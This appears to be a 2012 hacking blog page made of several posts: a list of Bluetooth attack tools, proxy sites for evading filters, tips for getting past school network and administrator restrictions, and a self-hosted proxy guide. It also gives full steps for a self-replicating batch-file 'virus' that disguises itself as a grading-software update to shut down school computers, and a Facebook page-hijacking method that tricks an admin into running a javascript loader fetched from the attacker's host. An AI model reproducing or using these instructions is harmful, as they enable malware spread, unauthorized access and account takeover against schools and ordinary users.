woensdag 18 april 2012

Tools for Hacking Bluetooth Enabled Devices

bluetooth-logo.jpgBluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).
If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.
This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner – BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.
BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 – the Java Bluetooth specification. Download BTBrowser.
BTCrawler -BTCrawler is a scanner for Windows based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.
CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.
Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.
Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.
Bluesnarfer – Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.
BTcrack – BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.
Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.
BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.
BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.
What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.

Incredible Proxy List(350+ Sites)

Incredible Proxy List(350+ Sites)

Many schools, universities, offices, ISPs and countries like Saudi Arabia, China, Pakistan, Burma, Iran, North Korea, Vietnam ,Cuba, Syria, Tunisia ,Uzbekistan, Egypt, Belarus and Turkmenistan don’t allow their surfers to access some web sites which them deem inappropriate.
Here is a list of Some proxy sites from my Incredible List of 350+ Proxy Sites which let you surf any web site. If you want that incredible list just write a comment to this article and I ll Email you that List.


http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.cheekyproxy.com
http://www.funkyproxy.com
http://www.surfsneaker.com
http://www.proxii.com
http://www.proxynumber1.com (Replace 1 with any number between 1 to 10) http://myspaceproxyy.com
http://tenpass.com
http://www.browsesneaky.com
http://www.proogle.info http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.slyuser.com/
http://pawxy.com
http://pawxy.org
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://aniscartujo.com/webproxy
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hidemefast.com
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://underproxy.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.proxyzip.org
http://www.hagiomusic.info
http://www.greenpips.info
http://www.allfreehere.info
http://www.takefreely.info
http://logu.in
http://autobypass.com
http://www.proxcity.info

Shut down your School!!


Shut down your School!!


This article is for only educational purpose, i am not responsible for any misuse of this article.
 

Step1


By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.

Step 2

Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg

Step 3

Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
Save this as global.bat

Step 4

They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5

The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6

The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

Breaking the Restrictions of the Administrator

Hello Friends many of you have come with this problem of hacking the Administrator in Windows XP. So her is the Solution to your problem. This works on Win 2000 & Win XP.
This can be used to gain access to the website you want to for free, and how you can gain access to ‘control panel’, and the various other tools of Windows that may have been blocked from your grasp like ‘regedit’ by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and password. Now When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.
Now you can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that’s cool because now we can access ‘Internet options’,
click in the ‘connections’ tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.
Its only an ‘Unplugging technique’ to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u’re will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don’t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt – Start>All Programs>Accessories>Command Prompt. Now type “cacls” in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type “cacls /?” for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember – this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse’s mouth – the Microsoft Resource Center. You will find a lot of very useful web-based extra’s here, most of them left unknowing to the general public – such as, “Online Crash Analysis” – a site that looks like Windows Update but you can upload your crash “dump logs” (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).
Now lets c how to open restricted site on college servers
Recomended: http://unblockall.net/
  • Bypass any filters from work or school and access your favorite community and entertainment sites
  • Enjoy a fast and reliable connection. Our dedicated machines have 1Gbps connection and 2 quad processors
  • Chat with your friends from work
  • Watch videos on Youtube
  • Login into Myspace, Facebook and all the popular community sites without losing the proxy
  • No traffic redirection
  • No PopUp and Annoying Ads!
To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This will automatically lead you to the destination page. With our service you are guaranteed to be able to login and operatate normally.
PLEASE DROP IN YOUR COMMENTS BELOW

School Network Hacking

School Network Hacking

How to become Admin on your school Network. This way works for most schools.
Howdy Everyone
This tutorial is for those newbies out there, wanting to “hack” their school.
Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.
Firstly get a feel for the layout of the network.. you can do this quickly by:
Start > Programs(Right Click) > Explore
this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS theres more options…
The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.
So to get around this you can do two things:
1) input this into the IE address “C:windowssystem32cmd.exe”
however this is very likely to be disabled.
2) Creating a Bat file to open Command Prompt.
You can do this by, opening IE > view > source.
once you have notepad open, where gonna make a .BAT file.
we want the BAT file to open up command prompt, so we type:
“CMD” without the “” press ENTER then save it as file.BAT.
Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.
So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.
Once we have it open now comes the good bit….
Before doing this, make sure you know a good lot of DOS commands.
Heres a great list www.computerhope.com/msdos
These are a few that you might like to try:
Net send * “Hungry Hacker is cool”
Shutdown -s -f -m &*92;NAME – rarely works
These will only work if you have the privilages to use them.
After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.
There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.
This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, – Now you have control over every computer!!
You could use the RAT to use the admins machine, here possibilites are endless!

How to Set up your own Proxy Server

How to Set up your own Proxy Server

Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.
Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net


1. phpproxy


Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.
You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess
The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]








2. cgiproxy


Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.
First, download the source and unpack it to a local directory.
Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.
After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)


3. What is being blocked


a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.

How to Hack Facebook Fan Page

How to Hack Facebook Fan Page

Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
1. Download the exploit from this Link.
2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.
3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.
4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)
5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:
www.yoursite.0fess.net/booster.js
6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.
javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)
Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

About the author:
Wamiq Ali is a tech. lover and a hacker,this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at www.hackersthirst.com.